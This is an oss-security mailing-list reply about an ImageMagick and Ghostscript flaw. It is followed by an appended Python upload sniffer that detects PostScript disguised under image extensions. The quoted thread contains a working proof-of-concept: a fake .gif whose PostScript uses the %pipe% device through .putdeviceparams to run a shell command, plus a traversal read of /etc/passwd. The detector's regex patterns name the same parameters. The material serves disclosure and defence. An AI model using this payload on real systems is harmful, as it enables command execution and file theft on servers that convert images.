Date: Fri, 30 Sep 2016 15:58:25 -0700
From: Tavis Ormandy <taviso@...gle.com>
To: Florian Weimer <fw@...eb.enyo.de>
Cc: oss-security@...ts.openwall.com
Subject: Re: ImageMagick identify "d:" hangs

On Fri, Sep 30, 2016 at 2:11 PM, Florian Weimer <fw@...eb.enyo.de> wrote:
> * Tavis Ormandy:
>>
>> $ cat test.gif
>> currentdevice null true mark /OutputICCProfile (%pipe%id > /dev/tty)
>> .putdeviceparams
>> quit
>> $ convert test.gif png:test.png
>>
>> (Note: I don't know why it doesn't work on earlier versions, maybe
>> it's possible to make it work, or some other param will work)
>
> It still tries to open a file in earlier versions, with directory
> traversal:
>
> [pid 29607] open("/usr/share/ghostscript/9.06/iccprofiles/../../../../../etc/passwd", O_RDONLY) = 5
>
> The %pipe%-based execution was introduced as a side effect of:
>

Thanks Florian!

I took a look where that directory comes from, I think it pulls it from
a userparam, like:

<< (ICCProfilesDir) (whatever) >> .setuserparams

That probably needs to be fixed. I wonder if there's a way to get that
directory to populate back into the PermitFileReading array?

Tavis.
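As an added example that is not part of this thread (it is neither Tavis's nor Florian's code, nor ImageMagick's or Ghostscript's), the following Python sniffer shows the defender's side of what the exchange above describes: the payload is a PostScript program delivered under a .gif name, so an upload check that trusts the extension passes it to the converter, which in turn hands it to Ghostscript. The sniffer classifies a buffer by its content alone, reports a mismatch against the claimed extension, and flags references to the Ghostscript device/user parameters and the %pipe% device named in the thread, including the bannerless form of the sample (no %!PS line). The magic signatures are standard; the operator list, the accepted-format list and every sample buffer are constructed assumptions for this example.

```python
import re

# Leading-byte signatures for the raster formats an upload endpoint usually
# accepts, plus the PostScript/PDF family that ImageMagick delegates to Ghostscript.
MAGIC = [
    (b"GIF87a", "gif"),
    (b"GIF89a", "gif"),
    (b"\x89PNG\r\n\x1a\n", "png"),
    (b"\xff\xd8\xff", "jpeg"),
    (b"%!PS", "ps"),
    (b"\xc5\xd0\xd3\xc6", "ps"),   # DOS EPS binary header
    (b"%PDF", "pdf"),
]

# PostScript operators that mark a text buffer as a PostScript program even
# without the %!PS banner (the thread's sample starts with `currentdevice`).
# Constructed list for this example.
POSTSCRIPT_OPS = re.compile(
    rb"\b(currentdevice|putdeviceparams|setuserparams|setpagedevice|showpage)\b"
)

# Ghostscript parameters and the %pipe% device discussed in the thread. None of
# these belong in a plain raster image, so every hit is reported.
GS_PARAM_REFS = re.compile(
    rb"%pipe%|\.putdeviceparams|\.setuserparams|OutputICCProfile|ICCProfilesDir|PermitFileReading"
)

# Assumed policy of the hypothetical endpoint: only these content types are accepted.
ALLOWED = ("gif", "png", "jpeg")

# Extension spellings folded onto the sniffer's type names.
EXT_ALIASES = {"jpg": "jpeg", "jpe": "jpeg", "eps": "ps"}


def _is_text(buf: bytes) -> bool:
    """True if every byte is printable ASCII or common whitespace."""
    return all(0x20 <= b < 0x7F or b in b"\t\r\n" for b in buf)


def sniff(data: bytes) -> str:
    """Classify a buffer by content only; the filename is never consulted."""
    for magic, kind in MAGIC:
        if data.startswith(magic):
            return kind
    head = data[:4096]
    if head and _is_text(head) and POSTSCRIPT_OPS.search(head):
        return "ps"  # bannerless PostScript program
    return "unknown"


def claimed_type(filename: str) -> str:
    """Type the upload claims to be, taken from its extension."""
    ext = filename.rsplit(".", 1)[-1].lower() if "." in filename else ""
    return EXT_ALIASES.get(ext, ext)


def assess(filename: str, data: bytes) -> dict:
    """Decide whether an upload may be handed to an image converter."""
    claimed = claimed_type(filename)
    actual = sniff(data)
    refs = sorted({m.decode("ascii") for m in GS_PARAM_REFS.findall(data)})
    mismatch = claimed != "" and actual != "unknown" and claimed != actual
    return {
        "claimed": claimed,
        "actual": actual,
        "mismatch": mismatch,
        "ghostscript_refs": refs,
        "accept": actual in ALLOWED and not mismatch and not refs,
    }


# Constructed sample uploads. The first mirrors the thread's shape (PostScript
# under a .gif name) with the shell command replaced by a placeholder.
SAMPLES = {
    "test.gif": (
        b"currentdevice null true mark /OutputICCProfile (%pipe%COMMAND)\n"
        b".putdeviceparams\nquit\n"
    ),
    "photo.gif": b"GIF89a\x01\x00\x01\x00\x80\x00\x00\xff\xff\xff\x00\x00\x00;",
    "photo.jpg": b"\xff\xd8\xff\xe0\x00\x10JFIF\x00",
    "report.pdf": b"%PDF-1.4\n%constructed stub\n",
}


def triage(samples: dict) -> dict:
    """Run assess() over a batch and return one verdict per filename."""
    return {name: assess(name, data) for name, data in samples.items()}


if __name__ == "__main__":
    for name, verdict in triage(SAMPLES).items():
        print(f"{name}: {verdict}")
```

This is a triage aid for a gateway in front of the converter, not a substitute for disabling the PS, EPS and PDF coders in ImageMagick's policy.xml so that untrusted input is never delegated to Ghostscript at all.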